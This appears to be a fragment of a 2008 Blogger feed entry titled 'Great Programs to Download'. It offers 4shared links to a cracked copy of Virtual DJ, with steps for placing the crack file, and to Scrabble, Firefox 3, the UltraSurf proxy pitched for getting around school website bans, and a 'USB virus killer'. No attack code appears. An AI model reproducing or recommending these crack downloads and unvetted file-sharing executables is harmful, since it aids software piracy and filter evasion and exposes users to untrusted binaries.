/&gt;&lt;br /&gt;This is the Virtual DJ +crack file . after installation,place crack file into your destination folder. Download &lt;a href="http://www.4shared.com/file/59763482/2dace0cc/Virtual_DJ.html"&gt;here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Scrabble game ,man .improve your brain,easy download &lt;a href="http://www.4shared.com/file/59512070/4672f8d/Scrabble.html"&gt;this&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;This is Mozilla FireFox version 3.0 ,easy download &lt;a href="http://www.4shared.com/file/59507431/1abbab41/firefox_3.html"&gt;here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Your school or somewhere ,websites banned? Access Denied? This is the anonymous proxy software.really great!! UltraSurf .it can automatically download to latest version.Just open that software. &lt;a href="http://www.4shared.com/file/59250826/dcec71b6/U90.html"&gt;here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;This is the USB virus killer.Really effective against autorun.inf,svhost.exe,fun.exe,flashy.exe,explorer.exe(HappyBirthday Virus),winomc.exe...etc.In about 1SEc!!! Download &lt;a href="http://www.4shared.com/file/59499915/1ab586e/Pen_Drive_Virus_Killer1.html"&gt;here&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-141906895784550444?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/141906895784550444/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/you-will-need-this.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/141906895784550444'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/141906895784550444'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/you-will-need-this.html' title='Great Programs to Download'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
